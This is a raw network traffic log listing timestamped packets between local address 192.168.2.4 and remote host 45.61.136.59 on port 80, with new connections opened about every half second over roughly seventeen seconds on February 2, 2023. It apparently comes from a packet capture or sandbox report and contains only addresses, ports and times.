                                                                                                                                            Feb 2, 2023 21:19:27.896337032 CET4994580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:27.897190094 CET4994580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:28.061892986 CET804994545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:28.061945915 CET804994545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:28.114927053 CET4994580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:28.185107946 CET4994580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:28.215787888 CET4994680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:28.351840019 CET804994545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:28.352178097 CET4994580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:28.389775038 CET804994645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:28.389951944 CET4994680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:28.390183926 CET4994680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:28.565922976 CET804994645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:28.566128969 CET804994645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:28.614886045 CET4994680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:29.273247004 CET4994680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:29.304869890 CET4994780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:29.447433949 CET804994645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:29.448503017 CET4994680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:29.469604969 CET804994745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:29.469713926 CET4994780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:29.470002890 CET4994780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:29.634524107 CET804994745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:29.634846926 CET804994745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:29.693084955 CET4994780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:29.953069925 CET4994780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:29.990523100 CET4994880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.117845058 CET804994745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.118781090 CET4994780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.155637980 CET804994845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.155908108 CET4994880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.156330109 CET4994880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.321247101 CET804994845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.321372032 CET804994845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.365093946 CET4994880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.429548979 CET4994880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.457921982 CET4994980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.594728947 CET804994845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.594928026 CET4994880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.625927925 CET804994945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.626229048 CET4994980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.626449108 CET4994980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.794220924 CET804994945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.794336081 CET804994945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.849545002 CET4994980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.898782969 CET4994980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:30.928481102 CET4995080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.067172050 CET804994945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.067414045 CET4994980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.095876932 CET804995045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.096019983 CET4995080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.096533060 CET4995080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.263981104 CET804995045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.264022112 CET804995045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.318479061 CET4995080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.370896101 CET4995080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.402462006 CET4995180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.538352966 CET804995045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.538422108 CET4995080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.567378998 CET804995145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.567640066 CET4995180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.567786932 CET4995180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.732486010 CET804995145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.732587099 CET804995145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.787096977 CET4995180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.836316109 CET4995180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:31.862396955 CET4995280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.001303911 CET804995145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.001425982 CET4995180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.027049065 CET804995245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.027261972 CET4995280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.033217907 CET4995280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.197942972 CET804995245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.197993994 CET804995245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.241543055 CET4995280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.306982040 CET4995280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.335536003 CET4995380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.471704960 CET804995245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.471894979 CET4995280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.500200033 CET804995345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.502903938 CET4995380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.504195929 CET4995380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.668795109 CET804995345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.668832064 CET804995345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.724850893 CET4995380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.791263103 CET4995380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.823724985 CET4995480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.956301928 CET804995345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.956392050 CET4995380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.988421917 CET804995445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.988894939 CET4995480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:32.989589930 CET4995480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:33.154155016 CET804995445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:33.154216051 CET804995445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:33.209125042 CET4995480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:33.258095980 CET4995480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:33.285722971 CET4995580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:33.422987938 CET804995445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:33.423373938 CET4995480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:33.450448990 CET804995545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:33.450786114 CET4995580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:33.451195955 CET4995580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:33.615623951 CET804995545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:33.615766048 CET804995545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:33.662251949 CET4995580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.198384047 CET4995580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.230561018 CET4995680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.363547087 CET804995545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:34.363836050 CET4995580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.397058010 CET804995645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:34.397202015 CET4995680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.397495031 CET4995680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.562109947 CET804995645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:34.562150955 CET804995645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:34.615441084 CET4995680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.682130098 CET4995680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.749655962 CET4995780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.846931934 CET804995645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:34.847045898 CET4995680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:34.914437056 CET804995745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:34.914628029 CET4995780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.087970972 CET4995780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.253087044 CET804995745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:35.253258944 CET804995745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:35.303071022 CET4995780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.380228996 CET4995780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.471514940 CET4995880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.545198917 CET804995745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:35.545311928 CET4995780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.639497995 CET804995845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:35.639627934 CET4995880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.642405033 CET4995880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.810236931 CET804995845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:35.810288906 CET804995845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:35.865526915 CET4995880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.916747093 CET4995880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:35.945878029 CET4995980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.084798098 CET804995845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.084985018 CET4995880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.110949993 CET804995945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.111085892 CET4995980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.111495018 CET4995980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.276519060 CET804995945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.276655912 CET804995945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.318656921 CET4995980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.383766890 CET4995980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.413768053 CET4996080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.548732996 CET804995945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.553019047 CET4995980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.578619003 CET804996045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.578885078 CET4996080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.579219103 CET4996080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.743721008 CET804996045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.743789911 CET804996045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.787535906 CET4996080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.853063107 CET4996080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:36.897443056 CET4996180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.017930984 CET804996045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:37.019095898 CET4996080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.065532923 CET804996145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:37.065674067 CET4996180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.066397905 CET4996180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.235557079 CET804996145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:37.235677004 CET804996145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:37.287544966 CET4996180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.351999044 CET4996180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.379209042 CET4996280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.520272017 CET804996145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:37.520456076 CET4996180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.544083118 CET804996245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:37.544207096 CET4996280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.544500113 CET4996280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:37.709136963 CET804996245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:37.709291935 CET804996245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:37.756331921 CET4996280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.051007986 CET4996280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.083422899 CET4996380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.215923071 CET804996245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.216023922 CET4996280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.248250008 CET804996345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.248413086 CET4996380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.248667002 CET4996380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.414316893 CET804996345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.414350033 CET804996345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.459477901 CET4996380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.524269104 CET4996380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.555679083 CET4996480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.689836025 CET804996345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.689975977 CET4996380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.720649004 CET804996445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.720782995 CET4996480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.721204996 CET4996480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.885675907 CET804996445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.885795116 CET804996445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.928344965 CET4996480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:38.994420052 CET4996480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.149298906 CET4996580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.159401894 CET804996445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:39.159527063 CET4996480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.314208031 CET804996545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:39.317524910 CET4996580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.324625015 CET4996580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.489463091 CET804996545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:39.489595890 CET804996545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:39.537688971 CET4996580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.629805088 CET4996580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.658133030 CET4996680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.794673920 CET804996545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:39.794955015 CET4996580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.822869062 CET804996645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:39.825575113 CET4996680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.826447964 CET4996680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:39.990957975 CET804996645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:39.991018057 CET804996645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.037853956 CET4996680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.104310036 CET4996680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.136511087 CET4996780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.269650936 CET804996645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.269813061 CET4996680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.304474115 CET804996745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.304585934 CET4996780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.304939985 CET4996780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.472889900 CET804996745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.472965956 CET804996745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.522257090 CET4996780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.587884903 CET4996780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.614805937 CET4996880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.755917072 CET804996745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.756175995 CET4996780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.779587984 CET804996845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.779968023 CET4996880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.780384064 CET4996880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:40.944991112 CET804996845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.945648909 CET804996845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.990957975 CET4996880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.057452917 CET4996880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.084330082 CET4996980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.222366095 CET804996845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.222589970 CET4996880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.252506018 CET804996945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.252742052 CET4996980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.252970934 CET4996980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.420865059 CET804996945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.420913935 CET804996945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.475414038 CET4996980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.525490046 CET4996980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.562150955 CET4997080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.693593025 CET804996945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.693790913 CET4996980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.727119923 CET804997045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.727297068 CET4997080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.727977037 CET4997080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:41.892282963 CET804997045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.892359018 CET804997045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.944158077 CET4997080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.010030031 CET4997080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.037826061 CET4997180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.174863100 CET804997045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:42.174953938 CET4997080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.211658955 CET804997145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:42.211821079 CET4997180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.216540098 CET4997180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.390285969 CET804997145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:42.390408039 CET804997145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:42.444221020 CET4997180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.665919065 CET4997180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.706532001 CET4997280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.840297937 CET804997145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:42.840472937 CET4997180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.871455908 CET804997245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:42.872297049 CET4997280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:42.872539043 CET4997280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.037178040 CET804997245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.037337065 CET804997245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.085093021 CET4997280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.149353981 CET4997280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.180702925 CET4997380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.314667940 CET804997245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.314899921 CET4997280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.346205950 CET804997345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.346328974 CET4997380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.346694946 CET4997380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.511441946 CET804997345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.511570930 CET804997345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.553819895 CET4997380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.620630026 CET4997380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.677228928 CET4997480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.785765886 CET804997345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.786012888 CET4997380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.842015982 CET804997445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.842225075 CET4997480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:43.842569113 CET4997480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.007188082 CET804997445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.007224083 CET804997445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.053796053 CET4997480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.122836113 CET4997480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.152755022 CET4997580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.287771940 CET804997445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.288177013 CET4997480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.320698977 CET804997545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.320954084 CET4997580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.321190119 CET4997580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.488964081 CET804997545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.489001036 CET804997545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.538197994 CET4997580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.604734898 CET4997580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.633387089 CET4997680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.772865057 CET804997545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.773010969 CET4997580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.801002026 CET804997645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.801084042 CET4997680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:19:44.801465988 CET4997680192.168.2.445.61.136.59
